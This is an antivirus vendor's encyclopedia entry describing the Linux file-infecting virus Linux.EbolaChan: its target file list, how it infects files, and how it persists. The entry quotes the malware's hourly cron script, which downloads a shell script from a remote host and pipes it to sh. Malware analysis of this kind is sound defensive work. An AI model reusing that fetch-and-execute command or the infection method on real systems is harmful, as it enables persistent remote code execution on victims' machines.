Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Linux.EbolaChan

Добавлен в вирусную базу Dr.Web: 2015-01-16

Описание добавлено:

Файловый вирус, угрожающий операционным системам Linux. Заражает файлы по следующему списку:

"ssdp"
"ssyn"
"udp"
"essyn"
"xmlrpc"
"ovh"
"xsyn"
"Installer"
"installer"
"50x"
"sdns"
"sudp"
"sx"
"scan"
"ddos"
"joomla"
"/bin/ls"
"a.out"
"x.pl"
"udp.pl"

Вирус пытается открыть файл из списка, загружает его в память и ищет в нем строку "Good luck, Ebola-chan!". Если она найдена, переходит к следующему файлу. Если не найдена, вирус записывает в файл свое тело, а затем записывает оригинальное содержимое файла. После запуска инфицированного файла сохраняет оригинальный файл в папку /tmp/ и запускает его. После окончания выполнения оригинального файла удаляет его из данной папки.

С помощью службы Cron (/etc/cron.hourly/0) вирус устанавливает на выполнение с интервалом в час следующий скрипт:

#!/bin/sh
 
wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>dev/null|sh>dev/null 2>&1

Скачиваемый файл также представляет собой sh-скрипт, предназначенный для выполнения на зараженной машине.

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру